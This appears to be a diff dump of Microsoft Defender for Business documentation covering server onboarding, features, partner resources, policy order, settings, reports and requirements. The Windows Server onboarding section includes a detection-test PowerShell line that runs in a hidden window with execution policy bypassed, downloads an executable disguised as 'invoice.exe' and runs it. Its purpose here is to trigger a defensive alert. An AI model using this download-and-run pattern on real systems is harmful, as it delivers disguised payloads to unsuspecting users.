-> - The enforcement scope for Windows Server is turned on. Go to **Settings** > **Endpoints** > **Configuration management** > **Enforcement scope**. Select **Use MDE to enforce security configuration settings from MEM**, select **Windows Server**, and then select **Save**.
-
-You can onboard an instance of Windows Server to Defender for Business by using a local script.
-
-### Local script for Windows Server
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), and sign in.
-
-2. In the navigation pane, choose **Settings** > **Endpoints**, and then under **Device management**, choose **Onboarding**.
-
-3. Select an operating system, such as **Windows Server 1803, 2019, and 2022**, and then in the **Deployment method** section, choose **Local script**.
-
- If you select **Windows Server 2012 R2 and 2016**, you have two packages to download and run: an installation package and an onboarding package. The installation package contains an MSI file that installs the Defender for Business agent. The onboarding package contains the script to onboard your Windows Server endpoint to Defender for Business.
-
-4. Select **Download onboarding package**. We recommend that you save the onboarding package to a removable drive.
-
- If you selected **Windows Server 2012 R2 and 2016**, also select **Download installation package**, and save the package to a removable drive
-
-5. On your Windows Server endpoint, extract the contents of the installation/onboarding package to a location such as the Desktop folder. You should have a file named `WindowsDefenderATPLocalOnboardingScript.cmd`.
-
- If you're onboarding Windows Server 2012 R2 or Windows Server 2016, extract the installation package first.
-
-6. Open a command prompt as an administrator.
-
-7. If you're onboarding Windows Server 2012R2 or Windows Server 2016, run the following command:
-
- `Msiexec /i md4ws.msi /quiet`
-
- If you're onboarding Windows Server 1803, 2019, or 2022, skip this step, and go to step 8.
-
-8. Type the location of the script file. For example, if you copied the file to the Desktop folder, you would type `%userprofile%\Desktop\WindowsDefenderATPLocalOnboardingScript.cmd`, and then press Enter (or select **OK**).
-
-9. Go to [Run a detection test on Windows Server](#run-a-detection-test-on-windows-server).
-
-### Run a detection test on Windows Server
-
-After you onboard your Windows Server endpoint to Defender for Business, you can run a detection test to make sure that everything is working correctly:
-
-1. On the Windows Server device, create a folder: `C:\test-MDATP-test`.
-
-2. Open Command Prompt as an administrator.
-
-3. In the Command Prompt window, run the following PowerShell command:
-
- ```powershell
- powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
- ```
-
-After the command runs, the Command Prompt window will close automatically. If successful, the detection test is marked as completed, and a new alert appears in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) for the newly onboarded device within about 10 minutes.
-
-## Linux Server
-
-> [!IMPORTANT]
-> Make sure that you meet the following requirements before you onboard a Linux Server endpoint:
-> - You have a Microsoft Defender for Business servers license. (See [How to get Microsoft Defender for Business servers](get-defender-business.md#how-to-get-microsoft-defender-for-business-servers).)
-> - You meet the [prerequisites for Microsoft Defender for Endpoint on Linux](../defender-endpoint/microsoft-defender-endpoint-linux.md#prerequisites).
-
-### Onboard Linux Server endpoints
-
-You can use the following methods to onboard an instance of Linux Server to Defender for Business:
--- **Local script:** See [Deploy Microsoft Defender for Endpoint on Linux manually](../defender-endpoint/linux-install-manually.md).-- **Ansible:** See [Deploy Microsoft Defender for Endpoint on Linux with Ansible](../defender-endpoint/linux-install-with-ansible.md).-- **Chef:** See [Deploy Defender for Endpoint on Linux with Chef](../defender-endpoint/linux-deploy-defender-for-endpoint-with-chef.md).-- **Puppet:** See [Deploy Microsoft Defender for Endpoint on Linux with Puppet](../defender-endpoint/linux-install-with-puppet.md).-
-> [!NOTE]
-> Onboarding an instance of Linux Server to Defender for Business is the same as onboarding to [Microsoft Defender for Endpoint on Linux](../defender-endpoint/microsoft-defender-endpoint-linux.md).
----
-## View a list of onboarded devices
-
-> [!IMPORTANT]
-> You must be assigned an appropriate role, such as Global Administrator, Security Administrator, or Security Reader to perform the following procedure. For more information, see [Roles in Defender for Business](mdb-roles-permissions.md#roles-in-defender-for-business).
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), and sign in.
-
-2. In the navigation pane, go to **Assets** > **Devices**. The **Device inventory** view opens.
-
-## Run a phishing test on a device
-
-After you've onboarded a device, you can run a quick phishing test to make sure the device is connected and that alerts are generated as expected.
-
-1. On a device, go to [https://smartscreentestratings2.net](https://smartscreentestratings2.net). Defender for Business should block that URL on the user's device.
-
-2. As a member of your organization's security team, go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-3. In the navigation pane, go to **Incidents**. You should see an informational alert that indicates a device tried to access a phishing site.
-
-## Next steps
--- If you have other devices to onboard, select the tab for those devices ([Windows 10 and 11, Mac, Servers, or Mobile devices](#what-to-do)), and follow the guidance on that tab.-- If you're done onboarding devices, proceed to [Step 6: Configure your security settings and policies in Defender for Business](mdb-configure-security-settings.md).-
security Mdb Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-overview.md
- Title: What is Microsoft Defender for Business?
-description: Microsoft Defender for Business is a cybersecurity solution for small and medium sized businesses. Defender for Business protects against threats across your devices.
----- Previously updated : 04/10/2024---- SMB-- m365-security-- m365-initiative-defender-business-- tier1-- essentials-overview---
-# What is Microsoft Defender for Business?
-
-Defender for Business is an endpoint security solution that was designed especially for the small- and medium-sized business (up to 300 employees). With this endpoint security solution, your company's devices are better protected from ransomware, malware, phishing, and other threats. Defender for Business is available as a standalone subscription and is included in [Microsoft 365 Business Premium](../../business-premium/m365bp-overview.md).
-
-This article describes what's included in Defender for Business and provides links to learn more about these features and capabilities.
-
-> [!TIP]
-> To learn more about Microsoft 365 Business Premium, see [Microsoft 365 Business Premium ΓÇô productivity and cybersecurity for small business](../../business-premium/m365bp-overview.md).
-
-## Video: Enterprise-grade protection for small- and medium-sized businesses
-
-Watch the following video to learn more about Defender for Business: <br/><br/>
-
-> [!VIDEO https://www.youtube.com/embed/umhUNzMqZto]
-
-## What's included with Defender for Business?
-
-Defender for Business includes a full range of device protection capabilities, as shown in the following diagram:
--
-With Defender for Business, you can help protect the devices and data your business uses with:
--- **Enterprise-grade security**. Defender for Business brings powerful endpoint security capabilities from our industry-leading [Microsoft Defender for Endpoint](../defender-endpoint/microsoft-defender-endpoint.md) solution and optimizes those capabilities for IT administrators to support small- and medium-sized businesses.--- **An easy-to-use security solution**. Defender for Business offers streamlined experiences that guide you to action with recommendations and insights into the security of your endpoints. No specialized knowledge is required, because Defender for Business offers wizard-driven configuration and default security policies that are designed to help protect your company's devices from day one.--- **Flexibility for your environment**. Defender for Business can work with your business environment, whether you're using Microsoft Intune or you're brand new to the Microsoft Cloud. Defender for Business works with components that are built into Windows, and with apps for Mac, iOS, and Android devices.--- **Integration with Microsoft 365 Lighthouse, RMM tools, and PSA software**. If you're a Microsoft cloud solution provider (CSP) using [Microsoft 365 Lighthouse](../../lighthouse/m365-lighthouse-overview.md), you can view security incidents and alerts across your customers' tenants (see [Microsoft 365 Lighthouse and Defender for Business](mdb-lighthouse-integration.md)). If you're a Microsoft managed service provider (MSP), you can integrate Defender for Business with your remote monitoring and management (RMM) tools and professional service automation (PSA) software (see [Defender for Business and MSP resources](mdb-partners.md)).-
-## How does Defender for Business compare to Microsoft 365 Business Premium?
-
-Defender for Business provides advanced security protection for your devices, with next-generation protection, endpoint detection and response, and threat & vulnerability management. Microsoft 365 Business Premium includes Defender for Business and provides more cybersecurity and productivity capabilities.
--
-For more detailed information about what's included in each subscription, see the following resources:
--- [Microsoft 365 licensing guidance for security & compliance](/office365/servicedescriptions/microsoft-365-service-descriptions/microsoft-365-tenantlevel-services-licensing-guidance/microsoft-365-security-compliance-licensing-guidance)--- [Microsoft 365 Education](/office365/servicedescriptions/office-365-platform-service-description/microsoft-365-education)--
-## Next steps
--- [Try the interactive guide: Get started with Defender for Business](https://aka.ms/MDB-GetStartedGuide)-- [Learn more about the simplified configuration process in Defender for Business](mdb-setup-configuration.md)-- [Find out how to get Defender for Business](get-defender-business.md)-- [Get an overview of Microsoft 365 Business Premium](../../business-premium/m365bp-overview.md)-
security Mdb Partners https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-partners.md
- Title: Resources for Microsoft partners working with small and medium-sized businesses
-description: Download our new security guide or integrate your remote monitoring and management (RMM) tools and professional service automation (PSA) software with Defender for Business, Microsoft 365 Business Premium, Defender for Endpoint, and Microsoft 365 Lighthouse.
----- Previously updated : 07/19/2023---- SMB-- m365-security-- tier1--
-# Resources for Microsoft partners working with small and medium-sized businesses
-
-> [!TIP]
-> **Read all about exciting, new capabilities releasing in July 2023 in the [Tech Community blog: New SMB security innovations from Microsoft Inspire 2023](https://aka.ms/SMBSecurityJulyBlog)**.
-
-Small and medium-sized businesses recognize that security is important, but they often don't have the capacity or expertise to have a dedicated security operations team. These customers often need help with setup and configuration, managing security for their devices and network, and addressing alerts or detected threats. Microsoft partners can help!
-
-If you're a Microsoft partner, and you're working with customers who have or need [Microsoft Defender for Business](mdb-overview.md), [Microsoft 365 Business Premium](../../business-premium/m365bp-overview.md), [Microsoft Defender for Endpoint](../defender-endpoint/microsoft-defender-endpoint.md), or [Microsoft 365 E3](../../enterprise/microsoft-365-overview.md), this article is for you!
--- [Download our security guide and checklist](#download-our-security-guide-and-checklist-new) (NEW!)-- [Learn how you can integrate Microsoft endpoint security with your RMM tools and PSA software](#integrate-microsoft-endpoint-security-with-your-rmm-tools-and-psa-software).-- [See how you can use Microsoft 365 Lighthouse to secure and manage your customers' devices and data](#use-microsoft-365-lighthouse-to-secure-and-manage-your-customers-devices-and-data).-- [Learn more about Defender for Business and Microsoft 365 Business Premium](#learn-more-about-defender-for-business-and-microsoft-365-business-premium).-
-## Download our security guide and checklist (NEW!)
-
-The [practical guide to security using Microsoft 365 Business (Basic, Standard, and Premium)](https://aka.ms/smbsecurityguide) guide is intended to start discussion around your customers' security and compliance options with Microsoft 365 for business. One of the first and most important things that IT leaders and business leaders can do is talk through the possibilities. This guide can help facilitate those discussions. You can also download a [summary checklist](https://aka.ms/smbsecuritychecklist) to use as a companion to the guide.
-
-Use this guidance to:
--- Adopt a formal, vendor-agnostic cybersecurity framework.-- Create a plan that includes identity management, admin accounts, device management, licensing, and more.-- Set up, configure, use, and maintain Microsoft 365 Business Premium, step by step.-- Implement and use data protection capabilities, such as sensitivity labels and DLP policies.-- Work with advanced capabilities, such as increased security, identity protection, and email & apps protection.-
-Use the links in the following table to access the guide and summary checklist:
-
-| Resource | Description |
-|:|:|
-| [Practical guide to security using Microsoft 365 Business (Basic, Standard, and Premium)](https://aka.ms/smbsecurityguide) | This Word document summarizes Microsoft's recommendations for enabling employees at small and medium-sized businesses to securely work from anywhere- whether from home, in the office or on the go, using the features included in Microsoft 365 Business Premium. |
-| [Checklist for security with Microsoft 365 Business Premium](https://aka.ms/smbsecuritychecklist) | This checklist includes all the planning and configuration steps covered in the guide, from getting started to configuring security and compliance capabilities, and provides general recommendations for each step. |
-
-## Integrate Microsoft endpoint security with your RMM tools and PSA software
-
-If you're a Microsoft Managed Service Provider (MSP), you can integrate Microsoft endpoint security with your remote monitoring and management (RMM) tools and your professional service automation (PSA) software so that you can:
--- Get access to your customers' Microsoft Defender portal to [address detected threats and incidents](mdb-respond-mitigate-threats.md).-- Get [email notifications](mdb-email-notifications.md) about new alerts or vulnerabilities across your customers' tenants.-- Fetch and view [incidents and alerts](mdb-view-manage-incidents.md) with your security information and event management (SIEM) tools.-- Orchestrate [remediation actions](mdb-review-remediation-actions.md), such as approving actions following automated investigations, or taking manual response actions on a device.-
-Integration can be done by using the [Defender for Endpoint APIs](../defender-endpoint/management-apis.md). Use the following resources to learn more:
-
-| Resource | Description |
-|:|:|
-| [Overview of management and APIs](../defender-endpoint/management-apis.md) | Defender for Business is built on Microsoft Defender for Endpoint, and is an integration-ready platform. This article describes how to automate workflows and innovate using the Defender for Endpoint APIs. |
-| [Configure managed security service provider integration](../defender-endpoint/configure-mssp-support.md) | Provides an overview of steps to take to successfully integrate a customer's tenant with your MSP solution. |
-
-## Use Microsoft 365 Lighthouse to secure and manage your customers' devices and data
-
-If you're a Microsoft Cloud Solution Provider (CSP) or MSP, you can use Microsoft 365 Lighthouse to help your customers manage their security settings and capabilities, and protect their data and devices. You can use Microsoft 365 Lighthouse to:
--- Manage your customers' security settings and capabilities. -- View and manage detected threats across your customers' tenants.-- Initiate antivirus scans on customers' devices to keep them up to date and protected.-
-| Resource | Description |
-|:|:|
-| [Microsoft 365 Lighthouse](../../lighthouse/m365-lighthouse-overview.md) | Provides an overview of Microsoft 365 Lighthouse, an admin portal that helps MSPs and CSPs secure and manage devices, data, and users for small and medium-sized businesses. |
-| [Microsoft 365 Lighthouse and Microsoft Defender for Business](mdb-lighthouse-integration.md) | Describes how Defender for Business integrates with Microsoft 365 Lighthouse and includes links to additional information. |
-
-## Learn more about Defender for Business and Microsoft 365 Business Premium
-
-| Resource | Description |
-|:|:|
-| [Microsoft Partner Network](https://partner.microsoft.com) | Visit the Microsoft Partner Network to learn how to become a Microsoft partner and join the Microsoft Partner Network. |
-| [Microsoft 365 Business Premium and Defender for Business partner webinar series](https://aka.ms/M365MDBseries) | This webinar series provides: <br/>- Practical guidance about how to have conversations with your customers about security and drive upsell to Microsoft 365 Business Premium. <br/>- Demos and deep dive walkthroughs for Microsoft 365 Lighthouse and Defender for Business. <br/>- A panel of experts to help answer your questions. |
-| [Microsoft 365 Business Premium partner playbook and readiness series](https://aka.ms/M365BPPartnerPlaybook) | Practical guidance on building a profitable managed services practice, with: <br/>- Examples of successful managed service offerings from industry experts and peers. <br/>- Technical enablement and checklists from Microsoft experts. <br/>- Sales enablement and customer conversation aids to help you market your solution. |
-| [Defender for Business partner kit](https://aka.ms/MDBPartnerKit) | The Defender for Business partner kit provides you with practical guidance, technical information, and customer-ready resources to market and sell Defender for Business to small and medium-sized businesses. |
-
security Mdb Policy Order https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-policy-order.md
- Title: Understand policy order in Microsoft Defender for Business
-description: Learn about order of priority with cybersecurity policies to protect your company devices with Defender for Business.
----- Previously updated : 05/05/2023---- SMB-- m365-security-- tier1--
-# Understand policy order in Microsoft Defender for Business
-
-Defender for Business includes [predefined policies](mdb-view-edit-create-policies.md#default-policies-in-defender-for-business) to help ensure the devices your employees use are protected. Your security team can [add new policies](mdb-view-edit-create-policies.md#create-a-new-policy) as well.
-
-For example, suppose that your security team wants to apply certain settings to some devices, and different settings to other devices. You can do that by adding policies, such as additional next-generation protection policies or firewall policies. As policies are added, policy order comes into play.
-
-## Policy order in Defender for Business
-
-When policies are added, an order of priority is assigned to all of the policies in the group, as shown in the following screenshot:
--
-The **Order** column lists the priority for each policy. Predefined policies move down in the order of priority when new policies are added. You can edit the order of priority for the policies that you define (select a policy, and then choose **Change order**). You can't change the order of priority for default policies.
-
-For example, suppose that for your Windows client devices, you have three next-generation protection policies. In this case, your default policy is number 3 in priority. You can change the order of your policies that are numbered 1 and 2, but the default policy will remain number 3 in your list.
-
-**The important thing to remember about multiple policies is that devices will receive the first applied policy only.** Referring to our earlier example of three next-generation policies, suppose that you have devices that are targeted by all three policies. In this case, those devices receive policy number 1, but won't receive policies numbered 2 and 3.
-
-## Key points to remember about policy order
--- Policies are assigned an order of priority automatically.-- You can change the order of priority for policies that are added, but not for default policies.-- Default policies are given the lowest order of priority as new policies are added.-- Devices receive the first applied policy only, even if those devices are included in multiple policies.-
-## See also
--- [Set up, review, and edit your security policies and settings](mdb-configure-security-settings.md)-- [View or edit policies](mdb-view-edit-create-policies.md)-- [Onboard devices](mdb-onboard-devices.md)
security Mdb Portal Advanced Feature Settings https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-portal-advanced-feature-settings.md
- Title: Review and edit settings in Microsoft Defender for Business
-description: View and edit settings for the Microsoft Defender portal and advanced features in Defender for Business
----- Previously updated : 10/06/2023----
-# Review and edit settings in Microsoft Defender for Business
-
-You can view and edit settings, such as portal settings and advanced features, in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)). Use this article to get an overview of the various settings that are available and how to edit your Defender for Business settings.
-
-## View settings for advanced features
-
-In the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), go to **Settings** > **Endpoints** > **General** > **Advanced features**.
-
-The following table describes advanced feature settings.
-
-| Setting | Description |
-|:|:|
-| **Automated Investigation** <br/>(turned on by default) | As alerts are generated, automated investigations can occur. Each automated investigation determines whether a detected threat requires action and then takes or recommends remediation actions, such as sending a file to quarantine, stopping a process, isolating a device, or blocking a URL. While an investigation is running, any related alerts that arise are added to the investigation until it's completed. If an affected entity is seen elsewhere, the automated investigation expands its scope to include that entity, and the investigation process repeats.<br/><br/>You can view investigations on the **Incidents** page. Select an incident, and then select the **Investigations** tab.<br/><br/>By default, automated investigation and response capabilities are turned on, tenant wide. **We recommend keeping automated investigation turned on**. If you turn it off, real-time protection in Microsoft Defender Antivirus will be affected, and your overall level of protection will be reduced. <br/><br/>[Learn more about automated investigations](../defender-endpoint/automated-investigations.md). |
-| **Live Response** | Defender for Business includes the following types of manual response actions: <br/>- Run antivirus scan<br/>- Isolate device<br/>- Stop and quarantine a file<br/>- Add an indicator to block or allow a file <br/><br/>[Learn more about response actions](../defender-endpoint/respond-machine-alerts.md). |
-| **Live Response for Servers** | (This setting is currently not available in Defender for Business.) |
-| **Live Response unsigned script execution** | (This setting is currently not available in Defender for Business.) |
-| **Enable EDR in block mode**<br/>(turned on by default) | Provides added protection from malicious artifacts when Microsoft Defender Antivirus isn't the primary antivirus product and is running in passive mode on a device. Endpoint detection and response (EDR) in block mode works behind the scenes to remediate malicious artifacts detected by EDR capabilities. Such artifacts might have been missed by the primary, non-Microsoft antivirus product.<br/><br/>[Learn more about EDR in block mode](../defender-endpoint/edr-in-block-mode.md). |
-| **Allow or block a file** <br/>(turned on by default) | Enables you to allow or block a file by using [indicators](../defender-endpoint/indicator-file.md). This capability requires Microsoft Defender Antivirus to be in active mode and [cloud protection](../defender-endpoint/cloud-protection-microsoft-defender-antivirus.md) turned on.<br/><br/>Blocking a file prevents it from being read, written, or executed on devices in your organization. <br/><br/>[Learn more about indicators for files](../defender-endpoint/indicator-file.md). |
-| **Custom network indicators**<br/>(turned on by default) | Enables you to allow or block an IP address, URL, or domain by using [network indicators](../defender-endpoint/indicator-ip-domain.md). This capability requires Microsoft Defender Antivirus to be in active mode and [network protection](../defender-endpoint/enable-network-protection.md) turned on.<br/><br/>You can allow or block IPs, URLs, or domains based on your threat intelligence. You can also prompt users if they open a risky app, but the prompt won't stop them from using the app.<br/><br/>[Learn more about network protection](../defender-endpoint/network-protection.md). |
-| **Tamper protection**<br/>(we recommend you turn on this setting) | Tamper protection prevents malicious apps from doing actions such as:<br/>- Disable virus and threat protection<br/>- Disable real-time protection<br/>- Turn off behavior monitoring<br/>- Disable cloud protection<br/>- Remove security intelligence updates<br/>- Disable automatic actions on detected threats<br/><br/>Tamper protection essentially locks Microsoft Defender Antivirus to its secure, default values and prevents your security settings from being changed by apps and unauthorized methods. <br/><br/>[Learn more about tamper protection](../defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection.md). |
-| **Show user details**<br/>(turned on by default) | Enables people in your organization to see details, such as employees' pictures, names, titles, and departments. These details are stored in Microsoft Entra ID.<br/><br/>[Learn more about user profiles in Microsoft Entra ID](/azure/active-directory/fundamentals/active-directory-users-profile-azure-portal). |
-| **Skype for Business integration**<br/>(turned on by default) | Skype for Business was retired in July 2021. If you haven't already moved to Microsoft Teams, see [Set up Microsoft Teams in your small business](/microsoftteams/deploy-small-business). <br/><br/>Integration with Microsoft Teams (or the former Skype for Business) enables one-click communication between people in your business. |
-| **Web content filtering**<br/>(turned on by default) | Blocks access to websites that contain unwanted content and tracks web activity across all domains. See [Set up web content filtering](mdb-web-content-filtering.md). |
-| **Microsoft Intune connection**<br/>(we recommend you turn on this setting if you have Intune) | If your organization's subscription includes Microsoft Intune (included in [Microsoft 365 Business Premium resources](../../business-premium/index.yml)), this setting enables Defender for Business to share information about devices with Intune. |
-| **Device discovery**<br/>(turned on by default) | Enables your security team to find unmanaged devices that are connected to your company network. Unknown and unmanaged devices introduce significant risks to your network, whether it's an unpatched printer, a network device with a weak security configuration, or a server with no security controls.<br/><br/>Device discovery uses onboarded devices to discover unmanaged devices, so your security team can onboard the unmanaged devices and reduce your vulnerability. <br/><br/>[Learn more about device discovery](../defender-endpoint/device-discovery.md). |
-| **Preview features** | Microsoft is continually updating services such as Defender for Business to include new feature enhancements and capabilities. If you opt in to receive preview features, you'll be among the first to try upcoming features in the preview experience. <br/><br/>[Learn more about preview features](../defender-endpoint/preview.md). |
-
-<a name='view-and-edit-other-settings-in-the-microsoft-365-defender-portal'></a>
-
-## View and edit other settings in the Microsoft Defender portal
-
-In addition to security policies applied to devices, there are other settings you can view and edit in Defender for Business. For example, you specify the time zone to use, and you can onboard (or offboard) devices.
-
-> [!NOTE]
-> You might see more settings in your tenant than are listed in this article. This article highlights the most important settings that you should review in Defender for Business.
-
-### Settings to review for Defender for Business
-
-The following table describes settings you can view and edit in Defender for Business:
-
-| Category | Setting | Description |
-|:|:|:|
-| **Security center** | **Time zone** | Select the time zone to use for the dates and times displayed in incidents, detected threats, and automated investigation and remediation. You can either use UTC or your local time zone (*recommended*). |
-| **Microsoft Defender XDR** | **Account** | View details such where your data is stored, your tenant ID, and your organization (org) ID. |
-| **Microsoft Defender XDR** | **Preview features** | Turn on preview features to try upcoming features and new capabilities. You can be among the first to preview new features and provide feedback. |
-| **Endpoints** | **Email notifications** | Set up or edit your email notification rules. When vulnerabilities are detected or an alert is created, the recipients specified in your email notification rules will receive an email. [Learn more about email notifications](mdb-email-notifications.md). |
-| **Endpoints** | **Device management** > **Onboarding** | Onboard devices to Defender for Business by using a downloadable script. To learn more, see [Onboard devices to Defender for Business](mdb-onboard-devices.md). |
-| **Endpoints** | **Device management** > **Offboarding** | Offboard (remove) devices from Defender for Business. When you offboard a device, it no longer sends data to Defender for Business, but data received prior to offboarding is retained. To learn more, see [Offboarding a device](mdb-offboard-devices.md). |
-
-<a name='access-your-settings-in-the-microsoft-365-defender-portal'></a>
-
-### Access your settings in the Microsoft Defender portal
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com/](https://security.microsoft.com/)), and sign in.
-
-2. Select **Settings**, and then select a category (such as **Security center**, **Microsoft Defender XDR**, or **Endpoints**).
-
-3. In the list of settings, select an item to view or edit.
-
security Mdb Preview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-preview.md
- Title: Microsoft Defender for Business preview features
-description: Learn how to access Microsoft Defender for Business preview features.
-keywords: preview, preview experience, Microsoft Defender for Business, features, updates
-
-ms.sitesec: library
-ms.pagetype: security
------ m365-security-- tier1- Previously updated : 03/23/2023--
-# Microsoft Defender for Business preview features
-
-**Applies to:**
--- [Microsoft Defender for Business](mdb-overview.md)-
-Defender for Business is constantly being updated to include new feature enhancements and capabilities.
-
-Learn about new features in Defender for Business preview releases, and be among the first to try upcoming features by turning on the preview experience.
-
-## What you need to know
-
-When working with features in public preview, these features:
--- Might have restricted or limited functionality. For example, the feature might only apply to one platform.-- Typically go through feature changes before they're generally available (GA).-- Are fully supported by Microsoft.-- Might only be available in selected geographic regions or cloud environments. For example, a preview feature might not exist in the government cloud.-- Individual features in preview might have more usage and support restrictions. If so, this information is typically noted in the feature documentation.-- The preview versions are provided with a standard support level, and can be used for production environments.-
-## Turn on preview features
-
-If you turn on preview features, you'll have access to upcoming features, enabling you to provide feedback and help improve the overall experience before these features are generally available.
--
-Turn on the preview experience setting to be among the first to try upcoming features.
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Advanced features** \> **Preview features**.
-
-2. Turn the setting to **On**, and then select **Save preferences**.
-
-## See also
--- [Get Microsoft Defender for Business](get-defender-business.md)-- [How to get Microsoft Defender for Business servers](get-defender-business.md#how-to-get-microsoft-defender-for-business-servers)-- [Trial user guide: Microsoft Defender for Business](trial-playbook-defender-business.md)-- [Visit the Microsoft Defender portal](mdb-get-started.md)-
security Mdb Reports https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-reports.md
- Title: Reports in Microsoft Defender for Business
-description: Get an overview of security reports in Defender for Business. Reports will show detected threats, alerts, vulnerabilities, and device status.
----- Previously updated : 03/23/2023---- SMB-- m365-security-- tier1--
-# Reports in Microsoft Defender for Business
-
-Several reports are available in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)). These reports enable your security team to view information about detected threats, device status, and more.
-
-This article describes these reports, how you can use them, and how to find them.
-
-## Monthly security summary (preview)
--
-The monthly security summary report (currently in preview) shows:
--- Threats that were detected and prevented by Defender for Business, so you can see how the service is working for you.-- Your current status from [Microsoft Secure Score](../defender/microsoft-secure-score.md), which gives you an indication of your organization's security posture. -- Recommended actions you can take to improve your score and your security posture.-
-To access this report, in the navigation pane, choose **Reports** > **Endpoints** > **Monthly Security Summary**.
-
-## License report
--
-The license report provides information about licenses your organization has purchased and is using.
-
-To access this report, in the navigation pane, choose **Settings** > **Endpoints** > **Licenses**.
-
-## Security report
--
-The security report provides information about your company's identities, devices, and apps.
-
-To access this report, in the navigation pane, choose **Reports** > **General** > **Security report**.
-
-> [!TIP]
-> You can view similar information on the home page of your Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)).
-
-## Threat protection report
--
-The threat protection report provides information about alerts and alert trends.
--- Use the **Alert trends** column to view information about alerts that were triggered over the last 30 days. -- Use the **Alert status** column to view current snapshot information about alerts, such as categories of unresolved alerts and their classification. -
-To access this report, in the navigation pane, choose **Reports** > **Endpoints** > **Threat protection**.
-
-## Incidents view
--
-You can use the **Incidents** list to view information about alerts. To learn more, see [View and manage incidents in Defender for Business](mdb-view-manage-incidents.md).
-
-To access this report, in the navigation pane, choose **Incidents** to view and manage current incidents.
-
-## Device health report
--
-The device health report provides information about device health and trends. You can use this report to determine whether Defender for Business sensors are working correctly on devices and the current status of Microsoft Defender Antivirus.
-
-To access this report, in the navigation pane, choose **Reports** > **Endpoints** > **Device health**.
-
-## Device inventory list
--
-You can use the **Devices** list to view information about your company's devices. To learn more, see [Manage devices in Defender for Business](mdb-manage-devices.md).
-
-To access this report, in the navigation pane, go to **Assets** > **Devices**.
-
-## Vulnerable devices report
--
-The vulnerable devices report provides information about devices and trends.
--- Use the **Trends** column to view information about devices that had alerts over the last 30 days. -- Use the **Status** column to view current snapshot information about devices that have alerts. -
-To access this report, in the navigation pane, choose **Reports** > **Endpoints** > **Vulnerable devices**.
-
-## Web protection report
--
-The web protection report shows attempts to access phishing sites, malware vectors, exploit sites, untrusted or low-reputation sites, and sites that are explicitly blocked. Categories of blocked sites include adult content, leisure sites, legal liability sites, and more.
-
-To access this report, in the navigation pane, choose **Reports** > **Endpoints** > **Web protection**.
-
-> [!NOTE]
-> If you haven't yet configured web protection for your company, choose the **Settings** button in a report view. Then, under **Rules**, choose **Web content filtering**. To learn more about web content filtering, see [Web content filtering](../defender-endpoint/web-content-filtering.md).
-
-## Firewall report
--
-When firewall protection is configured, the firewall report shows blocked inbound, outbound, and app connections. This report also shows remote IPs connected by multiple devices, and remote IPs with the most connection attempts.
-
-To access this report, in the navigation pane, choose **Reports** > **Endpoints** > **Firewall**.
-
-> [!NOTE]
-> If your firewall report has no data, it might be because you haven't configured your firewall protection yet. In the navigation pane, choose **Endpoints** > **Configuration management** > **Device configuration**. To learn more, see [Firewall in Defender for Business](mdb-firewall.md).
-
-## Device control report
--
-The device control report shows information about media usage, such as the use of removable storage devices in your organization.
-
-To access this report, in the navigation pane, choose **Reports** > **Endpoints** > **Device control**.
-
-## Attack surface reduction rules report
--
-The attack surface reduction rules report has three tabs:
--- **Detections** to show blocked or audited detections;-- **Configuration** enabling you to filter on standard protection rules or additional attack surface reduction rules; and -- **Add exclusions** enabling you to define exclusions, if needed. -
-To learn more, see [Attack surface reduction capabilities in Microsoft Defender for Business](mdb-asr.md).
-
-To access this report, in the navigation pane, choose **Reports** > **Endpoints** > **Attack surface reduction rules**.
-
-## See also
--- [Get started using Defender for Business](mdb-get-started.md)-- [View and manage incidents in Defender for Business](mdb-view-manage-incidents.md)-- [Manage devices in Defender for Business](mdb-manage-devices.md)-
security Mdb Requirements https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-requirements.md
- Title: Requirements for Microsoft Defender for Business
-description: Microsoft Defender for Business license, hardware, and software requirements
----- Previously updated : 10/24/2023----
-# Microsoft Defender for Business requirements
-
-This article describes the requirements for Defender for Business.
-
-## What to do
-
-1. [Review the requirements and make sure you meet them](#review-the-requirements).
-2. [Proceed to your next steps](#next-steps).
--
-## Review the requirements
-
-The following table lists the basic requirements you need to configure and use Defender for Business.
-
-| Requirement | Description |
-|:|:|
-| Subscription | Microsoft 365 Business Premium or Defender for Business (standalone). <br/>See [How to get Defender for Business](get-defender-business.md). |
-| Datacenter | One of the following datacenter locations: <br/>- European Union <br/>- United Kingdom <br/>- United States <br/>- Australia |
-| User accounts | - User accounts are created in the Microsoft 365 admin center ([https://admin.microsoft.com](https://admin.microsoft.com)). <br/>- Licenses for Defender for Business (or Microsoft 365 Business Premium) are assigned in the Microsoft 365 admin center.<br/><br/>To get help with this task, see [Add users and assign licenses](mdb-add-users.md). |
